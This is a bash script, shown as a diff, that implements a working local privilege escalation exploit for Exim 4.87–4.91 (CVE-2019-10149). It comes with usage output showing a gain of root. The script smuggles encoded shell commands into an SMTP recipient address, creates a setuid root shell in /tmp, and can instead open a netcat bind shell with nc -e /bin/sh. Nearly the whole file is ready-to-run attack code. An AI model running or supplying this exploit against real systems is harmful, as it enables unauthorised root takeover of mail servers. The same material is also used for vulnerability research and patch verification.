| | 1 | + | #!/bin/bash |
| | 2 | + | |
| | 3 | + | # |
| | 4 | + | # raptor_exim_wiz - "The Return of the WIZard" LPE exploit |
| | 5 | + | # Copyright (c) 2019 Marco Ivaldi <[email protected]> |
| | 6 | + | # |
| | 7 | + | # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). |
| | 8 | + | # Improper validation of recipient address in deliver_message() |
| | 9 | + | # function in /src/deliver.c may lead to remote command execution. |
| | 10 | + | # (CVE-2019-10149) |
| | 11 | + | # |
| | 12 | + | # This is a local privilege escalation exploit for "The Return |
| | 13 | + | # of the WIZard" vulnerability reported by the Qualys Security |
| | 14 | + | # Advisory team. |
| | 15 | + | # |
| | 16 | + | # Credits: |
| | 17 | + | # Qualys Security Advisory team (kudos for your amazing research!) |
| | 18 | + | # Dennis 'dhn' Herrmann (/dev/tcp technique) |
| | 19 | + | # |
| | 20 | + | # Usage (setuid method): |
| | 21 | + | # $ id |
| | 22 | + | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
| | 23 | + | # $ ./raptor_exim_wiz -m setuid |
| | 24 | + | # Preparing setuid shell helper... |
| | 25 | + | # Delivering setuid payload... |
| | 26 | + | # [...] |
| | 27 | + | # Waiting 5 seconds... |
| | 28 | + | # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned |
| | 29 | + | # # id |
| | 30 | + | # uid=0(root) gid=0(root) groups=0(root) |
| | 31 | + | # |
| | 32 | + | # Usage (netcat method): |
| | 33 | + | # $ id |
| | 34 | + | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
| | 35 | + | # $ ./raptor_exim_wiz -m netcat |
| | 36 | + | # Delivering netcat payload... |
| | 37 | + | # Waiting 5 seconds... |
| | 38 | + | # localhost [127.0.0.1] 31337 (?) open |
| | 39 | + | # id |
| | 40 | + | # uid=0(root) gid=0(root) groups=0(root) |
| | 41 | + | # |
| | 42 | + | # Vulnerable platforms: |
| | 43 | + | # Exim 4.87 - 4.91 |
| | 44 | + | # |
| | 45 | + | # Tested against: |
| | 46 | + | # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] |
| | 47 | + | # |
| | 48 | + | |
| | 49 | + | METHOD="setuid" # default method |
| | 50 | + | PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' |
| | 51 | + | PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' |
| | 52 | + | |
| | 53 | + | # usage instructions |
| | 54 | + | function usage() |
| | 55 | + | { |
| | 56 | + | echo "$0 [-m METHOD]" |
| | 57 | + | echo |
| | 58 | + | echo "-m setuid : use the setuid payload (default)" |
| | 59 | + | echo "-m netcat : use the netcat payload" |
| | 60 | + | echo |
| | 61 | + | exit 1 |
| | 62 | + | } |
| | 63 | + | |
| | 64 | + | # payload delivery |
| | 65 | + | function exploit() |
| | 66 | + | { |
| | 67 | + | # connect to localhost:25 |
| | 68 | + | exec 3<>/dev/tcp/localhost/25 |
| | 69 | + | |
| | 70 | + | # deliver the payload |
| | 71 | + | read -u 3 && echo $REPLY |
| | 72 | + | echo "helo localhost" >&3 |
| | 73 | + | read -u 3 && echo $REPLY |
| | 74 | + | echo "mail from:<>" >&3 |
| | 75 | + | read -u 3 && echo $REPLY |
| | 76 | + | echo "rcpt to:<$PAYLOAD>" >&3 |
| | 77 | + | read -u 3 && echo $REPLY |
| | 78 | + | echo "data" >&3 |
| | 79 | + | read -u 3 && echo $REPLY |
| | 80 | + | for i in {1..31} |
| | 81 | + | do |
| | 82 | + | echo "Received: $i" >&3 |
| | 83 | + | done |
| | 84 | + | echo "." >&3 |
| | 85 | + | read -u 3 && echo $REPLY |
| | 86 | + | echo "quit" >&3 |
| | 87 | + | read -u 3 && echo $REPLY |
| | 88 | + | } |
| | 89 | + | |
| | 90 | + | # print banner |
| | 91 | + | echo |
| | 92 | + | echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' |
| | 93 | + | echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>' |
| | 94 | + | echo |
| | 95 | + | |
| | 96 | + | # parse command line |
| | 97 | + | while [ ! -z "$1" ]; do |
| | 98 | + | case $1 in |
| | 99 | + | -m) shift; METHOD="$1"; shift;; |
| | 100 | + | * ) usage |
| | 101 | + | ;; |
| | 102 | + | esac |
| | 103 | + | done |
| | 104 | + | if [ -z $METHOD ]; then |
| | 105 | + | usage |
| | 106 | + | fi |
| | 107 | + | |
| | 108 | + | # setuid method |
| | 109 | + | if [ $METHOD = "setuid" ]; then |
| | 110 | + | |
| | 111 | + | # prepare a setuid shell helper to circumvent bash checks |
| | 112 | + | echo "Preparing setuid shell helper..." |
| | 113 | + | echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c |
| | 114 | + | gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null |
| | 115 | + | if [ $? -ne 0 ]; then |
| | 116 | + | echo "Problems compiling setuid shell helper, check your gcc." |
| | 117 | + | echo "Falling back to the /bin/sh method." |
| | 118 | + | cp /bin/sh /tmp/pwned |
| | 119 | + | fi |
| | 120 | + | echo |
| | 121 | + | |
| | 122 | + | # select and deliver the payload |
| | 123 | + | echo "Delivering $METHOD payload..." |
| | 124 | + | PAYLOAD=$PAYLOAD_SETUID |
| | 125 | + | exploit |
| | 126 | + | echo |
| | 127 | + | |
| | 128 | + | # wait for the magic to happen and spawn our shell |
| | 129 | + | echo "Waiting 5 seconds..." |
| | 130 | + | sleep 5 |
| | 131 | + | ls -l /tmp/pwned |
| | 132 | + | /tmp/pwned |
| | 133 | + | |
| | 134 | + | # netcat method |
| | 135 | + | elif [ $METHOD = "netcat" ]; then |
| | 136 | + | |
| | 137 | + | # select and deliver the payload |
| | 138 | + | echo "Delivering $METHOD payload..." |
| | 139 | + | PAYLOAD=$PAYLOAD_NETCAT |
| | 140 | + | exploit |
| | 141 | + | echo |
| | 142 | + | |
| | 143 | + | # wait for the magic to happen and spawn our shell |
| | 144 | + | echo "Waiting 5 seconds..." |
| | 145 | + | sleep 5 |
| | 146 | + | nc -v 127.0.0.1 31337 |
| | 147 | + | |
| | 148 | + | # print help |
| | 149 | + | else |
| | 150 | + | usage |
| | 151 | + | fi |
| | 152 | + | |
